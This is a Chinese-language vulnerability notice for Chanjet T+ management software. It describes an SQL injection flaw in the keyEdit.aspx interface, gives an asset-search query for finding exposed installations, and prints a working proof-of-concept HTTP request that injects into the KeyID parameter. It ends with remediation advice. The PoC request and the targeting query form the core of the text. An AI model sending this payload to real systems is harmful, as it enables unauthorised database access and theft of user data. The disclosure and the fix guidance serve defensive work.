產品介紹

暢捷通 T+ 是一款靈動，智慧，時尚的基于互聯網時代開發的管理軟件，主要針對中小型工貿與商貿企業，尤其適合有異地多組織機構（多工廠，多倉庫，多辦事處，多經銷商）的企業，涵蓋了財務，業務，生產等領域的應用，產品應用功能包括：采購管理、庫存管理、銷售管理、生產管理、分銷管理、零售管理、往來管理、現金銀行管理、總賬、移動應用等，融入了社交化、移動化、電子商務、互聯網信息訂閱等元素，為企業打造全新的生意模式、管理模式、工作模式。與傳統管理軟件相比，“T+”更強調企業管理向企業經營的轉變、等級化管人向平等化用人理念的轉變。

漏洞簡介

暢捷通keyEdit接口處存在SQL注入漏洞，攻擊者未經授權可以訪問數據庫中的數據，從而盜取用戶數據，造成用戶信息泄露。

資產測繪

app=“暢捷通-TPlus”

漏洞復現

POC:

GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: your_ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

sqlmap驗證

修復建議

1、升級到安全版本。
2、使用預編譯處理SQL查詢語句。
3、設置白名單訪問。